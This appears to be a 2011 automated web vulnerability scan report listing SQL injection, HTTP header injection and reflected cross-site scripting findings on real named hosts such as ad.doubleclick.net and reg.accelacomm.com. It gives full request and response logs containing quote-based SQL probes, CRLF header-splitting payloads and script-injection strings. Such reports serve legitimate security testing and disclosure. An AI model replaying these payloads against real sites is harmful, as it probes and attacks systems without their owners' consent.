SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /LoggingAgent/LoggingAgent HTTP/1.1 Host: pixel.yola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
<html><head><title>JBossWeb/2.0.1.GA - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-se ...[SNIP]... </b> Exception report</p> ...[SNIP]... <u>The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs.</u> ...[SNIP]...
Request 2
GET /LoggingAgent/LoggingAgent HTTP/1.1 Host: pixel.yola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
The Script parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Script parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/50552781/reg'&_from=cf4cf HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: test_sub_reg=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:18:16 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 16:18:16 GMT; Path=/ Set-Cookie: JSESSIONID=08197447BD0819E214C667E4146D292F; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1226
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "'/LP/50552781/reg''"</font> ...[SNIP]...
The Script parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Script parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request 1
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csoznee4778';alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg'&10/50552781/_from=cso HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: test_sub_reg=-105b800c:12e634a5162:-1251.90; regid=-105b800c:12e634a5162:-1251.90; JSESSIONID=EC582D1069267246C7FDEB32983056F9; Svr=svr.regwa2; __utma=192604602.318667683.1298902742.1298902742.1298902742.1; __utmb=192604602; __utmc=192604602; __utmz=192604602.1298902742.1.1.utmccn=(referral)|utmcsr=zones.computerworld.com|utmcct=/ncircle/registration.php|utmcmd=referral
Response 1
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:18:41 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 16:18:41 GMT; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1232
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "'/LP/c8ec899850f/reg''"</font> ...[SNIP]...
Request 2
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csoznee4778';alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg''&10/50552781/_from=cso HTTP/1.1 Host: reg.accelacomm.com Proxy-Connection: keep-alive Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: test_sub_reg=-105b800c:12e634a5162:-1251.90; regid=-105b800c:12e634a5162:-1251.90; JSESSIONID=EC582D1069267246C7FDEB32983056F9; Svr=svr.regwa2; __utma=192604602.318667683.1298902742.1298902742.1298902742.1; __utmb=192604602; __utmc=192604602; __utmz=192604602.1298902742.1.1.utmccn=(referral)|utmcsr=zones.computerworld.com|utmcct=/ncircle/registration.php|utmcmd=referral
Response 2
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 14:18:41 GMT Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 16:18:41 GMT; Path=/ Content-Type: text/html; charset=UTF-8 Pragma: no-cache Cache-Control: no-cache, no-store, no-transform Expires: -1 P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC" Connection: close Content-Length: 1168
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]...
2. HTTP header injectionpreviousnext There are 16 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
The value of REST URL parameter 1 is copied into the Location response header. The payload 27472%0d%0ae6185a58aa2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /27472%0d%0ae6185a58aa2/idge.cso.data_protection/ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/27472 e6185a58aa2/idge.cso.data_protection/: Date: Mon, 28 Feb 2011 13:29:52 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3ac51%0d%0a2af670789b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3ac51%0d%0a2af670789b9/idge.cso.zone/module HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3ac51 2af670789b9/idge.cso.zone/module: Date: Mon, 28 Feb 2011 13:29:53 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1d587%0d%0affa1b6bda77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1d587%0d%0affa1b6bda77/idgt.data.cso/data_collection_cso HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1d587 ffa1b6bda77/idgt.data.cso/data_collection_cso: Date: Mon, 28 Feb 2011 13:29:53 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1bfc4%0d%0adf53ec42484 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1bfc4%0d%0adf53ec42484/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_vnzdaprTYuTIpnQlQf2x630A42HpOsB3YCL8hLjqLazM5CJiwQQARgBIMDIgxo4AFDEwrTWBmDJhqOH1KOAEKABo67u9gOyAQ53d3cuYml6ZmluZC51c7oBCjE2MHg2MDBfYXPIAQnaARZodHRwOi8vd3d3LmJpemZpbmQudXMvuAIYwAIFyALl78UYqAMB0QOCjebmy6JxrugD0Sn1AwAAAMQ&num=1&sig=AGiWqtzgratqXpBAo1y1j-ESKutiIL89pQ&client=ca-pub-3033999741136561&adurl=;ord=1568904022? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=600&slotname=5116297667&w=160&lmt=1298923247&flash=10.2.154&url=http%3A%2F%2Fwww.bizfind.us%2F&dt=1298901647316&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298901647336&frm=0&adk=3977642506&ga_vid=1551423665.1298901533&ga_sid=1298901533&ga_hid=200456462&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=888&bih=923&ref=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221'%2Fabc-development-inc%2Fchicago.aspx%2Fx22&fu=0&ifi=1&dtd=44&xpc=YBWQhJ3iv0&p=http%3A//www.bizfind.us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 8c7b5%0d%0a9ead5015a16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8c7b5%0d%0a9ead5015a16/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BTJZMB7prTerWAaHjlQetkoXABY2HpOsBhaKK8hLjqLazM9DU4wEQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAThmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3d3dy5iaXpmaW5kLnVzXzgwLmh0bbgCGMACBcgC5e_FGKgDAdEDgo3m5suica7oA-UD6APFBugDlAHoA-wF9QMCAADE&num=1&sig=AGiWqtx1NNT9B8_aB2xJuQQNNdNEHXPYJA&client=ca-pub-4063878933780912&adurl=;ord=1422869169? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1298927233&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fwww.bizfind.us_80.htm&dt=1298905633613&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298905633634&frm=0&adk=1607234649&ga_vid=228457643.1298905634&ga_sid=1298905634&ga_hid=1950173026&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1116&bih=939&fu=0&ifi=1&dtd=86&xpc=86OwR2A1P4&p=file%3A// Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 2758b%0d%0af8a74e8199f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2758b%0d%0af8a74e8199f/N5552.3159.GOOGLECN.COM/B5038686.44 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2758b f8a74e8199f/N5552.3159.GOOGLECN.COM/B5038686.44: Date: Mon, 28 Feb 2011 13:29:51 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 48e42%0d%0a28a200d46 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /48e42%0d%0a28a200d46/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=10;pos=bottomimu;sz=336x280,300x250,336x600;tagtype=iframe;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/48e42 28a200d46/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=10;pos=bottomimu;sz=336x280,300x250,336x600;tagtype=iframe;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831: Date: Mon, 28 Feb 2011 12:46:33 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4b185%0d%0a71e095ee542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4b185%0d%0a71e095ee542/idge.cso.zone/;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;referrer=ncircle;compsz=;indust=;empcnt=;ord=7037695359904319? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4b185 71e095ee542/idge.cso.zone/;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;referrer=ncircle;compsz=;indust=;empcnt=;ord=7037695359904319: Date: Mon, 28 Feb 2011 12:44:54 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 17507%0d%0ac0d40e6ce56 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /17507%0d%0ac0d40e6ce56/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/17507 c0d40e6ce56/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564: Date: Mon, 28 Feb 2011 13:19:24 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a364%0d%0a570042f383c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4a364%0d%0a570042f383c/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=5;pos=dogear;dcopt=ist;sz=1x1;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4a364 570042f383c/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=5;pos=dogear;dcopt=ist;sz=1x1;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831: Date: Mon, 28 Feb 2011 12:46:08 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 57987%0d%0a44140822130 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /57987%0d%0a44140822130/idge.cso.zone/module;tile=6;pos=topimu;sz=336x280,300x250,336x600;type=module;ord=9537889300845564? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/57987 44140822130/idge.cso.zone/module;tile=6;pos=topimu;sz=336x280,300x250,336x600;type=module;ord=9537889300845564: Date: Mon, 28 Feb 2011 13:19:25 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 34c08%0d%0a75548075a34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /34c08%0d%0a75548075a34/idgt.data.cso/data_collection_cso;sz=1x1;ord=7037695359904319? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/34c08 75548075a34/idgt.data.cso/data_collection_cso;sz=1x1;ord=7037695359904319: Date: Mon, 28 Feb 2011 12:44:58 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f9c6%0d%0a690d9353619 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f9c6%0d%0a690d9353619/idge.cso.data_protection/ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6f9c6 690d9353619/idge.cso.data_protection/: Date: Mon, 28 Feb 2011 13:29:53 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 50d48%0d%0adcd5e49237 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /50d48%0d%0adcd5e49237/idge.cso.zone/module HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/50d48 dcd5e49237/idge.cso.zone/module: Date: Mon, 28 Feb 2011 13:29:54 GMT Server: GFE/2.0 Connection: close
The value of the O_CREATIVE_ID request parameter is copied into the O_CREATIVE_ID response header. The payload 9b43d%0d%0aa6df4a1c5d was submitted in the O_CREATIVE_ID parameter. This caused a response containing an injected HTTP header.
Request
GET /load/227245/index.html?O_R_NUM=93877455&O_RANK=1&O_CREATIVE_ID=9b43d%0d%0aa6df4a1c5d&O_PPLACEMENT_ID=1&O_SITE_ID=12169& HTTP/1.1 Host: ads1.revenue.net Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Train0=.CABJ2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo5Mzg3NzQ1NToxOjBYAwQ5ODk0MjY1SAGQAQU4OTk0NTA6LSkEAAcxMjk4ODk5NDUwEQAA
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:30 GMT Server: Oversee Webserver v1.3.20 Vary: Accept-Encoding Cache-control: private, no-cache, must-revalidate Pragma: no-cache P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 26 Jul 1997 05:00:00 GMT Connection: close O_CREATIVE_ID: 9b43d a6df4a1c5d Content-Type: text/html Content-Length: 0
The value of REST URL parameter 1 is copied into the Location response header. The payload 288f2%0d%0a2d484208b0e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /288f2%0d%0a2d484208b0e/Process/ID/SignInByAccountNumber HTTP/1.1 Host: idcenter.services.optimum.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 28 Feb 2011 13:32:33 GMT Location: http://www.optimum.net/288f2 2d484208b0e/Process/ID/SignInByAccountNumber Connection: close
<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD> <H1>Not Found</H1> The requested object does not exist on this server. The link you followe ...[SNIP]...
3. Cross-site scripting (reflected)previous There are 103 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
